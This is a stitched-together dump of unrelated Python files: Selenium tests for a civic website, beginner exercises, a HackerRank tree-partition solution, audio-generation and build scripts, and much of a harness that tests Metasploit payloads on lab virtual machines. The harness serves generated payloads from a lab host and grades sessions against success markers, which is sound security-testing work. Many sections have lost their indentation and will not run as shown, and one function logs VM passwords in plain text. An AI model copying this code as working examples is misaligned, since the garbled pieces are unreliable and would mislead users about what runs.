            "The six of us believe that a well-informed populace is crucial to a functioning democracy. We wanted a way for people to easily see what issues their representatives are and aren’t talking about in their tweets and on the Congress floor, and we wanted to highlight which issues are being discussed and which ones require attention on a nation-wide scale. To that end, we’ve built Congress and Me.",
        )

    def test_11(self):
        self.browser.get("https://congressand.me/")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_xpath(
            "/html/body/div/div/main/div[1]/div/div[2]/p"
        )
        self.assertEqual(
            home_page.text,
            '"The ballot is stronger than the bullet." - Abraham Lincoln',
        )

    def test_12(self):
        self.browser.get("https://congressand.me/representatives/page/1")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_xpath(
            "/html/body/div/div/main/div[1]/div[1]/div[2]/p"
        )
        self.assertEqual(home_page.text, "Learn who represents your State!")

    def test_13(self):
        self.browser.get("https://congressand.me/states/page/1")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_xpath(
            "/html/body/div/div/main/div[1]/div[1]/div[2]/p"
        )
        self.assertEqual(home_page.text, "Learn more about your State!")

    def test_14(self):
        self.browser.get("https://congressand.me/issues/page/1")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_xpath(
            "/html/body/div/div/main/div[1]/div[2]/p"
        )
        self.assertEqual(home_page.text, "All the hottest topics being discussed")

    def test_15(self):
        self.browser.get("https://congressand.me/about")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_class_name("jumbotron-heading")
        self.assertEqual(
            home_page.text, "",
        )

    # --- visualizations page ---
    def test_16(self):
        self.browser.get("https://congressand.me/visualizations")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_xpath(
            "/html/body/div/div/main/section/div/p"
        )
        self.assertEqual(
            home_page.text, "A picture is worth a thousand lines of code.",
        )

    def test_17(self):
        self.browser.get("https://congressand.me/visualizations")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_class_name("jumbotron-heading")
        self.assertEqual(
            home_page.text, "Visualizations",
        )

    def test_18(self):
        self.browser.get("https://congressand.me/visualizations")
        self.browser.implicitly_wait(3)
        home_page = self.browser.find_element_by_class_name("navbar-brand")
        self.assertEqual(home_page.text, "Congress and Me")
if __name__ == "__main__":
main()
browser.quit()
display.stop()
|
# append list to second list
# Read five elements into each list, then append l2's items onto l1.
l1=list()
l2=list()
for i in range(5):
    # input() returns str, so the lists hold strings, not numbers.
    l1.append((input("enter element:")))
for i in range(5):
    l2.append((input("enter element:")))
print(l1)
print(l2)
for i in range(5):
    l1.append(l2[i])
print(l1)
|
import os
import random
from game import node, info
from cfr import cfr_player
from human import human_player
# Train a CFR (counterfactual regret minimization) player and save it to disk.
C0 = 2  # NOTE(review): appears unused in this script — confirm before removing.
player = cfr_player()
# 60 * 60 * 4 * 60 = 864000: the training budget passed to train();
# presumably iterations or a time budget — confirm against the cfr module.
player.train(60 * 60 * 4 * 60)
player.output("test.QAQ")  # persist the trained strategy
#/usr/bin/env python
# Author:tjy
# -*- utf-8 -*-
# Demonstrates that rebinding `name` does not change `name2`, which still
# references the original string object.
name = "tjy"
name2 = name
print("my name is", name, name2)
name = "paochege"
print(name, name2)  # name2 still prints "tjy"
PI = 3.1415926  # approximation of pi
print(PI)
print("您好")  # "Hello" in Chinese
#!/bin/python
import math
import os
import random
import re
import sys
# Complete the balancedForest function below.
class Tree:
    """N-ary tree node that maintains a live subtree-weight aggregate.

    `data` always equals the node's own value plus the values of all its
    descendants: addChild/removeChild push the weight delta up through every
    ancestor so the invariant holds after each structural change.
    """

    def __init__(self, key, data):
        self.data = data      # subtree weight: own value + all descendants
        self.children = {}    # key -> child Tree node
        self.parent = None
        self.key = key

    def addChild(self, key, node):
        """Attach `node` under `self`; add its weight to self and all ancestors."""
        self.children[key] = node
        self.data += node.data
        ancestor = self.parent
        while ancestor is not None:
            ancestor.data += node.data
            ancestor = ancestor.parent
        node.parent = self

    def removeChild(self, node):
        """Detach `node` if present; subtract its weight from self and ancestors.

        The detached node keeps its old parent pointer (mirrors the caller's
        detach/re-attach pattern in balancedForest)."""
        if self.children.get(node.key):
            del self.children[node.key]
            self.data -= node.data
            ancestor = self.parent
            while ancestor is not None:
                ancestor.data -= node.data
                ancestor = ancestor.parent

    def addParent(self, node):
        """Make `node` the parent of this node; no-op unless self is a root."""
        if self.parent is None:
            node.children[self.key] = self
            node.data += self.data
            self.parent = node

    def printTree(self):
        """Print "(parent_key, key)" for every node, DFS order; roots show 0."""
        stack = [self]
        while stack:
            current = stack.pop()
            print("(%d, %d)" % (0 if current.parent == None else current.parent.key, current.key))
            stack.extend(current.children.values())

    def printWeights(self):
        """Print "(key, subtree_weight)" for every node in DFS order."""
        stack = [self]
        while stack:
            current = stack.pop()
            print("(%d, %d)" % (current.key, current.data))
            stack.extend(current.children.values())

    def getRootNode(self):
        """Follow parent links upward and return the tree's root."""
        node = self
        while node.parent is not None:
            node = node.parent
        return node
def balancedForest(c, edges):
# HackerRank "Balanced Forest": weights c[i] for nodes 1..n plus tree edges.
# Find the smallest weight of ONE extra node that lets the tree be cut into
# three equal-weight pieces; return -1 when impossible.  Relies on the Tree
# class above, whose .data is a live subtree-weight sum.
#print(c)
#print(edges)
total = sum(c)
weights = []
# NOTE(review): `weights` is never used below -- dead local.
treeNodes = {}
def getParentChield(e):
# Orient edge e as (parent, child) according to how the tree was built.
if treeNodes[e[0]].parent == treeNodes[e[1]]:
return treeNodes[e[1]], treeNodes[e[0]]
else:
return treeNodes[e[0]], treeNodes[e[1]]
# One Tree node per input weight; keys are 1-based node ids.
for i in range(1, len(c)+1):
node = Tree(i, c[i-1])
treeNodes[i] = node
#root = treeNodes[4]
'''
for e in edges:
if e[0] > e[1]:
e[0],e[1] = e[1],e[0]
'''
# Build the rooted tree by repeatedly attaching leaves (ids appearing in
# exactly one remaining edge) to their neighbour, then dropping that edge.
unique = []
flatten = [item for sublist in edges for item in sublist]
tedges = edges[:]
while len(tedges) > 0:
for i in range(1, len(c)+1):
if flatten.count(i) == 1:
unique.append(i)
#flatten.remove(i)
while len(unique) > 0:
tu = unique.pop()
#print(tu)
td = None
for e in tedges:
if tu in e:
#print((e[0]+e[1]-tu))
# e[0]+e[1]-tu is the edge's other endpoint.
treeNodes[tu].addParent(treeNodes[(e[0]+e[1]-tu)])
td = e
break
if td: tedges.remove(td)
flatten = [item for sublist in tedges for item in sublist]
#tedges = edges.copy()
'''
for i in range(1, len(c)+1):
for e in edges:
if i == e[0]:
print("edges:",e, i, treeNodes[e[1]].data)
treeNodes[i].addChild(e[1], treeNodes[e[1]])
'''
root = treeNodes[1].getRootNode()
#root.printTree()
#print("---")
#root.printWeights()
ans = total
el = len(edges)
# Try every edge as the first cut: `a` is one piece; then scan the remaining
# component for a second cut producing pieces b and c.
for i in range(el):
e = edges[i]
#print("edges:",e)
#tw = treeNodes[e[0]].data - treeNodes[e[1]].data
tParent, tChild = getParentChield(e)
tCmpNode = None
if (tParent.data - tChild.data) >= tChild.data:
a = tChild.data
#itrnode = tParent
#tw = tParent.data - tChild.data
# Two equal halves already: pad with a third node of weight a.
if a*2 == total:
ans = a
# Temporarily detach the child so subtree sums describe the remainder;
# re-attached at the bottom of the loop.
tParent.removeChild(tChild)
itrnode = tParent.getRootNode()
tw = itrnode.data
tCmpNode = tChild
else:
a = tParent.data - tChild.data
itrnode = tChild
tw = itrnode.data
'''
if (treeNodes[e[0]].data - treeNodes[e[1]].data) >= treeNodes[e[1]].data:
a = treeNodes[e[1]].data
itrnode = treeNodes[e[0]]
tw = treeNodes[e[0]].data - treeNodes[e[1]].data
else:
a = treeNodes[e[0]].data - treeNodes[e[1]].data
itrnode = treeNodes[e[1]]
tw = itrnode.data
'''
#a = treeNodes[e[0]].data - treeNodes[e[1]].data
#itrnode = treeNodes[e[1]]
#treeNodes[e[0]].data = treeNodes[e[0]].data - treeNodes[e[1]].data
tq = [itrnode]
#tw = itrnode.data
while len(tq) > 0:
tn = tq.pop()
for cn in tn.children.values():
if cn == tCmpNode:
continue
tq.append(cn)
b = tw - cn.data
# NOTE: local c shadows the parameter c inside this loop.
c = cn.data
d = [a,b,c]
tans = d.count(max(d))
#print("d:",d)
# Valid when at least two pieces tie for max and padding the minimum
# up to the max balances all three (total + pad == 3*max).
if tans >=2 and ans > (max(d) - min(d)):
if (max(d) - min(d) + total) == 3*max(d):
ans = max(d) - min(d)
#print(a,b,c,tw)
#treeNodes[e[0]].data = treeNodes[e[0]].data + treeNodes[e[1]].data
# Restore the tree for the next candidate edge.
if tCmpNode != None:
tParent.addChild(tCmpNode.key,tCmpNode)
if ans == total:
ans = -1
#print("answer:",ans)
return ans
# Python 2 driver (raw_input/xrange/list-returning map): reads q test cases
# from stdin and writes one balancedForest answer per line to out.txt.
if __name__ == '__main__':
fptr = open("out.txt", 'w')
q = int(raw_input())
for q_itr in xrange(q):
n = int(raw_input())
c = map(int, raw_input().rstrip().split())
edges = []
# n-1 edges, each "u v" (1-based node ids).
for _ in xrange(n - 1):
edges.append(map(int, raw_input().rstrip().split()))
result = balancedForest(c, edges)
fptr.write(str(result) + '\n')
fptr.close()
|
# py2exe build script: bundles Mainwindow.py into a Windows console .exe.
# Run with:  python setup.py py2exe
from distutils.core import setup
import py2exe
setup(console=['Mainwindow.py'])
import numpy as np
import wavio
# Clip 1: 3 s of a 440 Hz sine at 22.05 kHz, written as 24-bit PCM.
rate = 22050 # samples per second
T = 3 # sample duration (seconds)
f = 440.0 # sound frequency (Hz)
t = np.linspace(0, T, T*rate, endpoint=False)
x = np.sin(2*np.pi * f * t)
wavio.write("sine24.wav", x, rate, sampwidth=3)
# Clip 2: 5 s mix of a 440 Hz sine and an 880 Hz cosine sampled at 1024 Hz.
# NOTE(review): 1024 Hz is below the Nyquist rate for both tones, so this
# aliases heavily -- presumably intentional for a "noise" file; confirm.
rate = 1024
T = 5
t = np.linspace(0, T, T*rate, endpoint=False)
f1 = 440.0
f2 = 880.0
# NOTE(review): a1/a2 look like intended amplitudes but are never applied
# to x below.
a1 = 1
a2 = 5
x = np.sin(2*np.pi * f1 * t) + np.cos(2*np.pi * f2 * t)
wavio.write("noise.wav", x, rate, sampwidth=3)
from datetime import datetime
import os
import time
import json
import vm_automation
from __builtin__ import False
#
# GOT TIRED OF TRACKING THIS DATA IN A LIST
#
class portValue:
    """Monotonic port-number dispenser.

    Every call to get() bumps the internal counter and returns the new
    value, so each caller receives a unique port without any external
    bookkeeping of which values were already handed out.  (Stands in for a
    singleton; construct it once with the starting value.)
    """

    def __init__(self, initialValue):
        # get() pre-increments, so the first value returned is initialValue + 1.
        self.portNumber = initialValue

    def get(self):
        """Return the next unused port number."""
        self.portNumber += 1
        return self.portNumber
def bailSafely(testConfig):
    """Abort the run: warn, give the operator a 10 s Ctrl-C window, reset all
    VMs, then exit with status 998.

    Bug fixed: when testConfig was None or had no 'LOG_FILE' key, logFile was
    never bound and the first logMsg() call raised NameError; logging now
    falls back to "default.log" in that case.
    """
    logFile = "default.log"
    if testConfig != None and 'LOG_FILE' in testConfig:
        logFile = testConfig['LOG_FILE']
    logMsg(logFile, "AN ERROR HAPPENED; RETURNING VMS TO THEIR FULL UPRIGHT AND LOCKED POSITIONS")
    timeToWait = 10
    for i in range(timeToWait):
        # Countdown so the operator can abort before the VMs are reverted.
        logMsg(logFile, "SLEEPING FOR " + str(timeToWait-i) + " SECOND(S); EXIT NOW TO PRESERVE VMS!")
        time.sleep(1)
    if resetVms(testConfig):
        logMsg(logFile, "SUCCESSFULLY RESET VMS")
    else:
        logMsg(logFile, "THERE WAS A PROBLEM RESETTING VMS")
    exit(998)
def breakoutClones(hostDicList, logFile):
"""
Expand each host's CLONES entries into full host dicts appended onto
hostDicList, splitting the host's SESSION_DATASETS evenly across the
original and its clones (integer division under this file's Python 2
dialect; the remainder stays with the original host).
TODO: FIX THIS SO ANYTHING NOT LISTED WILL EXPAND RATHER THAN EXPAND ONLY WHAT'S LISTED
NOTE(review): appends to hostDicList while iterating it; new clones have
no CLONES key so they are skipped, but confirm this is intended.
NOTE(review): if a clone pre-defines SESSION_DATASETS, cloneDic[item] is
never initialised before the append below -- looks like a latent
KeyError; confirm clones never carry their own SESSION_DATASETS.
NOTE(review): sessionsPerClone is only bound when the host itself has
SESSION_DATASETS -- a host with CLONES but no SESSION_DATASETS would hit
NameError; confirm the config always provides both.
"""
for host in hostDicList:
if "CLONES" in host:
numClones = len(host['CLONES']) + 1 #Don't forget the original
logMsg(logFile, "FOUND " + str(numClones) + " CLONES")
if 'SESSION_DATASETS' in host:
numSessions = len(host['SESSION_DATASETS'])
sessionsPerClone = numSessions/numClones
logMsg(logFile, "USING " + str(sessionsPerClone) + " PAYLOADS PER CLONE")
for clone in host['CLONES']:
cloneDic = {}
# Copy every field from the parent host, overriding per-clone values.
for item in host:
if item == 'NAME':
cloneDic[item] = clone['NAME']
logMsg(logFile, "ADDED CLONE " + clone['NAME'])
elif item == 'HYPERVISOR_CONFIG':
# A clone may live on a different hypervisor than its parent.
if 'HYPERVISOR_CONFIG' in clone:
cloneDic[item] = clone['HYPERVISOR_CONFIG']
else:
cloneDic[item] = host['HYPERVISOR_CONFIG']
elif item == 'SESSION_DATASETS':
if 'SESSION_DATASETS' not in clone:
cloneDic['SESSION_DATASETS'] = []
# Move this clone's share of sessions off the parent host.
for index in range(sessionsPerClone):
cloneDic[item].append(host[item].pop(0))
elif item == 'CLONES':
continue
else:
cloneDic[item] = host[item]
hostDicList.append(cloneDic)
def checkData(testConfig):
"""
Grade every session: a session passes when its downloaded session log
(LOCAL_SESSION_FILE) contains every marker string in the target's
SUCCESS_LIST.  Sets sessionData['STATUS'] per session and returns True
only when every checked session passed.
NOTE(review): sessions whose local file cannot be opened are skipped
(left without STATUS) and do NOT fail the overall result -- confirm
that is intended.
"""
testResult = True
for target in testConfig['TARGETS']:
logMsg(testConfig['LOG_FILE'], "CHECKING " + target['NAME'])
for sessionData in target['SESSION_DATASETS']:
payloadName = "NONE"
if 'PAYLOAD' in sessionData:
payloadName = sessionData['PAYLOAD']['NAME']
logMsg(testConfig['LOG_FILE'], "CHECKING " + sessionData['MODULE']['NAME'] + ":" + payloadName)
statusFlag = True
try:
fileObj = open(sessionData['LOCAL_SESSION_FILE'], 'r')
fileContents = fileObj.read()
fileObj.close()
except IOError as e:
logMsg(testConfig['LOG_FILE'], "FAILED TO OPEN LOCAL REPORT FILE: " + sessionData['LOCAL_SESSION_FILE'])
continue
# Any missing success marker fails this session (each miss is logged).
for item in target['SUCCESS_LIST']:
if item not in fileContents:
logMsg(testConfig['LOG_FILE'], str(item))
statusFlag = False
sessionData['STATUS'] = statusFlag
if statusFlag:
logMsg(testConfig['LOG_FILE'], sessionData['LOCAL_SESSION_FILE'])
logMsg(testConfig['LOG_FILE'], "TEST PASSED: " + \
target['NAME'] + ':' + \
payloadName + ":" + \
sessionData['MODULE']['NAME'])
else:
testResult = False
logMsg(testConfig['LOG_FILE'], sessionData['LOCAL_SESSION_FILE'])
logMsg(testConfig['LOG_FILE'], "TEST FAILED: " + \
target['NAME'] + ':' + \
payloadName + ":" + \
sessionData['MODULE']['NAME'])
return testResult
def createServer(configFile, logFile = "default.log"):
"""
Instantiate a hypervisor server object from a JSON config file.
Returns an esxiServer or workstationServer (from vm_automation) depending
on HYPERVISOR_TYPE, or None when the file is unreadable, unparsable, or
missing HYPERVISOR_TYPE.
NOTE(review): an unrecognized HYPERVISOR_TYPE falls off the end and
returns None silently -- consider logging that case.
"""
try:
fileObj = open(configFile, 'r')
configStr = fileObj.read()
fileObj.close()
except IOError as e:
logMsg(logFile, "UNABLE TO OPEN FILE: " + str(configFile) + '\n' + str(e))
return None
try:
hypervisorDic = json.loads(configStr)
except Exception as e:
logMsg(logFile, "UNABLE TO PARSE FILE: " + str(configFile) + '\n' + str(e))
return None
if "HYPERVISOR_TYPE" not in hypervisorDic:
print("INVALID CONFIG FILE; NO HYPERVISOR_TYPE FOUND")
return None
if hypervisorDic['HYPERVISOR_TYPE'].lower() == "esxi":
return vm_automation.esxiServer.createFromConfig(hypervisorDic, logFile)
if hypervisorDic['HYPERVISOR_TYPE'].lower() == "workstation":
return vm_automation.workstationServer(hypervisorDic, logFile)
def expandGlobalAttributes(configData, logFile = "default.log"):
    """Copy every key from configData['TARGET_GLOBALS'] onto each dict in
    configData['TARGETS'] that does not already define it (per-target values
    win over globals).  Mutates configData in place; no return value.

    The logFile parameter is kept for interface compatibility, but this
    function does no logging -- the original's dead
    `logFile = configData['LOG_FILE']` store has been removed.
    """
    if 'TARGET_GLOBALS' in configData:
        # Snapshot the keys so the iteration is independent of the dict object.
        for key in list(configData['TARGET_GLOBALS']):
            for target in configData['TARGETS']:
                if key not in target:
                    target[key] = configData['TARGET_GLOBALS'][key]
def expandGlobalList(hostList, globalList, listName):
    """Append every item of globalList onto each host's `listName` list,
    creating the list first for hosts that lack it.  Mutates hosts in place."""
    for host in hostList:
        host.setdefault(listName, []).extend(globalList)
def expandPayloadsAndModules(testConfig):
"""
Fan the run-wide PAYLOADS/MODULES lists out to every target, filtering
payloads by rough name matching:
* skip x64 payloads on non-x64 targets,
* skip mettle payloads on Windows targets,
* skip win payloads on non-Windows targets.
Each target gets its own copies (payload SETTINGS list is sliced, modules
are dict.copy()'d) so later per-target edits do not alias.
"""
for target in testConfig['TARGETS']:
if 'PAYLOADS' not in target:
target['PAYLOADS'] = []
if 'MODULES' not in target:
target['MODULES'] = []
if 'SESSION_DATASETS' not in target:
target['SESSION_DATASETS'] = []
if 'PAYLOADS' in testConfig:
for payload in testConfig['PAYLOADS']:
if 'x64' not in target['NAME'].lower() and 'x64' in payload['NAME'].lower():
#MISMATCHED ARCH; BAIL
continue
if 'win' in target['NAME'].lower() and 'mettle' in payload['NAME'].lower():
#DO NOT USE METTLE PAYLOADS ON WINDOWS
continue
if 'win' not in target['NAME'].lower() and 'win' in payload['NAME'].lower():
#ONLY USE WIN PAYLOADS ON WIN
continue
else:
logMsg(testConfig['LOG_FILE'], "ADDING " + str(payload))
tempPayload = {}
tempPayload['NAME'] = payload['NAME']
# Shallow-copy SETTINGS so per-target edits don't leak back.
tempPayload['SETTINGS'] = payload['SETTINGS'][:]
target['PAYLOADS'].append(tempPayload)
# TODO: ADD A CHECK SO WE DO NOT HAVE MULTIPLE SIMILAR MODULES
if 'MODULES' in testConfig:
for module in testConfig['MODULES']:
target['MODULES'].append(module.copy())
def findAndConfigVms(vmList, vmDataList, logFile = "default.log"):
    """Match VM config entries to live VM objects by case-insensitive name
    substring and set each match's credentials.  Returns the matched VM
    objects; entries missing VM_NAME/VM_USERNAME/VM_PASSWORD are logged and
    skipped.

    Bug fixed: logMsg takes (logFile, message) but was called here with only
    the message, raising TypeError; a logFile parameter with a default is now
    threaded through, keeping existing two-argument callers working.
    """
    foundVmList = []
    for vmData in vmDataList:
        try:
            vmName = vmData['VM_NAME']
            vmUsername = vmData['VM_USERNAME']
            vmPassword = vmData['VM_PASSWORD']
        except KeyError as e:
            logMsg(logFile, "[JSON PARSE ERROR]: COULD NOT FIND VALUE " + \
                   str(e))
            continue
        for j in vmList:
            if vmName.lower() in j.vmName.lower():
                foundVmList.append(j)
                logMsg(logFile, "ADDING USERNAME " + vmUsername + " PASSWORD " + vmPassword + " TO " + vmName + " : " + j.vmName)
                j.setPassword(vmPassword)
                j.setUsername(vmUsername)
    return foundVmList
def finishAndLaunchStageOne(msfHosts, httpPort, logFile):
# MAKE THE REST OF THE STAGE ONE SCRIPT
"""
ONCE ALL THE RC AND VENOM STUFF IS IN THE STAGE ONE SCRIPT, ADD THE COMMAND TO
START AN HTTP SERVER TO SERVE THE PAYLOADS, THEN WRITE THE SCRIPT TO A LOCAL FILE,
UPLOAD IT, AND RUN IT ON THE MSF_HOST.
Appends to each host's STAGE_ONE_SCRIPT: cd to the payload dir, start a
Python 2 SimpleHTTPServer on httpPort, and capture `netstat -ant` 50 times
at 5 s intervals into netstat.txt.  Returns False on the first local write
failure, True otherwise.
"""
for msfHost in msfHosts:
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + "cd " + msfHost['MSF_PAYLOAD_PATH'] + "/" + "\n"
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + "python -m SimpleHTTPServer " + str(httpPort) + " &\n"
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + "echo '' > netstat.txt\n"
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + "for i in {1..50}; do\n"
# If you reset the file each time, there's a very good chance of getting empty files during the write process.
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + " netstat -ant >> netstat.txt\n"
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + " sleep 5\n"
msfHost['STAGE_ONE_SCRIPT'] = msfHost['STAGE_ONE_SCRIPT'] + "done\n"
try:
fileObj = open(msfHost['STAGE_ONE_FILENAME'], 'w')
fileObj.write(msfHost['STAGE_ONE_SCRIPT'])
fileObj.close()
except IOError as e:
logMsg(logFile, "[ERROR] FAILED TO WRITE TO FILE " + msfHost['STAGE_ONE_FILENAME'] + str(e))
return False
remoteStageOneScriptName = msfHost['SCRIPT_PATH'] + '/stageOneScript.sh'
# Ensure the remote artifact/script directories exist before upload.
msfHost['VM_OBJECT'].makeDirOnGuest(msfHost['MSF_ARTIFACT_PATH'])
msfHost['VM_OBJECT'].makeDirOnGuest(msfHost['SCRIPT_PATH'])
"""
RUN STAGE ONE SCRIPTS
"""
msfHost['VM_OBJECT'].uploadAndRun(msfHost['STAGE_ONE_FILENAME'], remoteStageOneScriptName)
return True
def checkStagesNeeded(targetData):
    """Return (stageTwoNeeded, stageThreeNeeded) for one target.

    Stage two is needed as soon as any session dataset carries a PAYLOAD;
    stage three additionally requires a bind-style payload name (the handler
    must connect out to the target).
    """
    datasets = targetData['SESSION_DATASETS']
    stage_two = any('PAYLOAD' in sd for sd in datasets)
    stage_three = any('PAYLOAD' in sd and 'bind' in sd['PAYLOAD']['NAME']
                      for sd in datasets)
    return (stage_two, stage_three)
def finishStageTwo(testConfig, terminationToken, timeoutSec = 300):
"""
Poll (every 5 s, up to timeoutSec) each VM_TOOLS_UPLOAD target's remote
stage-two log for terminationToken, downloading the log each cycle into
REPORT_DIR.  Marks host['TERMINATION_TOKEN'] once the token is seen.
Returns True when polling finishes (all done OR timeout); False only when
the operator hits Ctrl-C.
NOTE(review): `timeoutSec/5` is integer division under this file's
Python 2 dialect; under Python 3 a non-multiple-of-5 timeout would make
range() raise on a float.
"""
for waitCycles in range(timeoutSec/5):
stageTwoComplete = True
try:
for host in testConfig['TARGETS']:
stageTwoNeeded, stageThreeNeeded = checkStagesNeeded(host)
if stageTwoNeeded:
if 'VM_TOOLS_UPLOAD' in host['METHOD'].upper():
if 'TERMINATION_TOKEN' not in host:
# Pull a fresh copy of the remote log for this poll cycle.
localFile = testConfig['REPORT_DIR'] + "/" + host['NAME'] + "_stageTwoLog_" + str(waitCycles) + ".txt"
if 'REMOTE_LOG' not in host:
logMsg(testConfig['LOG_FILE'], "REMOTE_LOG NOT IN: " + str(host['NAME']))
host['VM_OBJECT'].getFileFromGuest(host['REMOTE_LOG'], localFile)
try:
logFileObj = open(localFile, 'r')
logData = logFileObj.read()
logFileObj.close()
except IOError as e:
logMsg(testConfig['LOG_FILE'], "FAILED READING REMOTE LOG FILE: " + localFile + "\n" + str(e))
logData = ""
pass
if terminationToken not in logData:
logMsg(testConfig['LOG_FILE'], "NO TERMINATION TOKEN IN LOGFILE ON " + host['NAME'] + "\n")
stageTwoComplete = False
else:
logMsg(testConfig['LOG_FILE'], "TERMINATION TOKEN FOUND IN LOGFILE ON " + host['NAME'] + "\n")
localFile = testConfig['REPORT_DIR'] + "/" + host['NAME'] + "_netstat_" + str(waitCycles) + ".txt"
host['TERMINATION_TOKEN'] = True
else:
logMsg(testConfig['LOG_FILE'], "ALREADY FOUND TERMINATION TOKEN ON " + host['NAME'] + "\n")
if stageTwoComplete == True:
break;
time.sleep(5)
except KeyboardInterrupt:
print("CAUGHT KEYBOARD INTERRUPT; ABORTING TEST AND RESETTING VMS....")
return False
return True
def generateBranchScript(branchString, logFile):
    """Build the shell snippet that checks out the requested framework branch.

    branchString forms:
      * "upstream/..." / "origin/..." or a bare ref -> plain `git checkout`.
      * "user/repo/branch" -> add that GitHub fork as a remote, fetch it and
        check out a local tracking branch.
    Returns the script text (newline-terminated lines).
    """
    parts = branchString.split('/')
    logMsg(logFile, "FRAMEWORK BRANCH LIST: " + str(parts))
    logMsg(logFile, "FRAMEWORK BRANCH LIST LENGTH: " + str(len(parts)))
    isStandard = len(parts) > 0 and ((parts[0] == 'upstream' or parts[0] == 'origin') or (len(parts) == 1))
    if isStandard:
        # EITHER A COMMIT VERSION IN MASTER, PR OR upstream/master -- use as-is.
        logMsg(logFile, "FRAMEWORK REPO TO USE: " + branchString)
        return "git checkout " + branchString + "\n"
    # Nonstandard fork: user/repo/branch.
    logMsg(logFile, "NONSTANDARD FRAMEWORK REPO DETECTED: " + branchString)
    userName = parts[0]
    logMsg(logFile, "NONSTANDARD FRAMEWORK USERNAME: " + userName)
    repoName = parts[1]
    logMsg(logFile, "NONSTANDARD FRAMEWORK REPO NAME: " + repoName)
    branchName = parts[2]
    logMsg(logFile, "NONSTANDARD FRAMEWORK BRANCH NAME: " + branchName)
    remoteUrl = "https://github.com/" + userName + "/" + repoName + ".git"
    script = [
        "git remote add " + userName + " " + remoteUrl + "\n",
        "git fetch " + userName + "\n",
        "git checkout -b " + branchName + ' ' + userName + '/' + branchName + "\n",
    ]
    return "".join(script)
def getCreds(configData, logFile = "default.log"):
"""
Fill in USERNAME/PASSWORD for every MSF host and target from the JSON
credentials file configData['CREDS_FILE'].  Values already present on a
VM entry are kept.  Returns True on success; False when the creds file is
unreadable/unparsable or a needed credential is missing (getElement
returns False).
"""
if 'LOG_FILE' in configData:
logFile = configData['LOG_FILE']
try:
credsFile = open(configData['CREDS_FILE'], 'r')
credsStr = credsFile.read()
credsFile.close()
except IOError as e:
logMsg(logFile, "UNABLE TO OPEN FILE: " + str(configData['CREDS_FILE']) + '\n' + str(e))
return False
try:
credsDic = json.loads(credsStr)
except Exception as e:
logMsg(logFile, "UNABLE TO PARSE FILE: " + str(configData['CREDS_FILE']) + '\n' + str(e))
return False
vmList = configData['MSF_HOSTS'] + configData['TARGETS']
for vm in vmList:
if 'USERNAME' not in vm:
logMsg(logFile, "NO USERNAME FOR " + str(vm['NAME']) + '\n')
username = getElement('USERNAME', vm['NAME'], credsDic)
if username == False:
return False
else:
logMsg(logFile, "FOUND USERNAME FOR " + str(vm['NAME']) + '\n')
vm['USERNAME'] = username
if 'PASSWORD' not in vm:
logMsg(logFile, "NO PASSWORD FOR " + str(vm['NAME']) + '\n')
password = getElement('PASSWORD', vm['NAME'], credsDic)
if password == False:
return False
else:
logMsg(logFile, "FOUND PASSWORD FOR " + str(vm['NAME']) + '\n')
vm['PASSWORD'] = password
return True
def getElement(element, vmName, credsDic):
    """Look up `element` (e.g. 'USERNAME') for vmName in the creds dict.

    Leading/trailing whitespace on vmName is ignored.  Returns the stored
    value, or False when the VM or the element is absent.
    """
    wanted = vmName.strip()
    for name, creds in credsDic.items():
        if wanted == name and element in creds:
            return creds[element]
    return False
def getListFromFile(fileName, logFile = "default.log"):
    """Read fileName and return its non-blank, non-'#'-comment lines,
    stripped, in order.  A None fileName returns an empty list.

    Bugs fixed: blank lines crashed with IndexError (`strip()[0]` on ''),
    and logMsg was called without its logFile argument (TypeError); logFile
    is now a defaulted parameter, so existing one-argument callers still
    work.
    """
    retList = []
    logMsg(logFile, "GETTING COMMANDS FROM " + str(fileName))
    if fileName != None:
        with open(fileName, 'r') as fileObj:
            for line in fileObj.readlines():
                stripped = line.strip()
                # Skip blanks and comment lines.
                if stripped and not stripped.startswith('#'):
                    retList.append(stripped)
    logMsg(logFile, str(retList))
    return retList
def getSessionCount(testConfig):
    """Return the total number of session datasets across all targets
    (targets without a SESSION_DATASETS key contribute zero)."""
    return sum(len(host['SESSION_DATASETS'])
               for host in testConfig['TARGETS']
               if 'SESSION_DATASETS' in host)
def getTimestamp():
    """Current Unix time as a whole-seconds string (fractional part dropped)."""
    return str(int(time.time()))
def instantiateVmsAndServers(testConfig):
"""
For every MSF host and target of TYPE 'VIRTUAL', create (or reuse, keyed
by config path) the hypervisor server object named by HYPERVISOR_CONFIG,
enumerate its VMs, and bind the VM object whose name matches the target
(plus any credentials) onto the target dict.  Returns the list of VM
objects found; a None placeholder is appended for each VM not found.
NOTE(review): the "DID NOT FIND" log line references loop variable `vm`,
which is unbound when the server's vmList is empty -- confirm.
"""
testVms = []
hypervisorDic = {}
logFile = testConfig['LOG_FILE']
for target in testConfig['MSF_HOSTS'] + testConfig['TARGETS']:
logMsg(logFile, "PROCESSING: " + target['NAME'])
if target['TYPE'].upper() == 'VIRTUAL':
# Reuse one server object per hypervisor config file.
if target['HYPERVISOR_CONFIG'] in hypervisorDic:
target['SERVER_OBJECT'] = hypervisorDic[target['HYPERVISOR_CONFIG']]
else:
hypervisorDic[target['HYPERVISOR_CONFIG']] = createServer(target['HYPERVISOR_CONFIG'], logFile)
target['SERVER_OBJECT'] = hypervisorDic[target['HYPERVISOR_CONFIG']]
target['SERVER_OBJECT'].enumerateVms()
"""
INSTANTIATE VM INSTANCE AND STORE IT IN THE DICTIONARY
"""
vmFound = False
for vm in target['SERVER_OBJECT'].vmList:
if vm.vmName == target['NAME']:
vmFound = True
logMsg(logFile, "FOUND VM: " + vm.vmName + " ON " + vm.server.hostname)
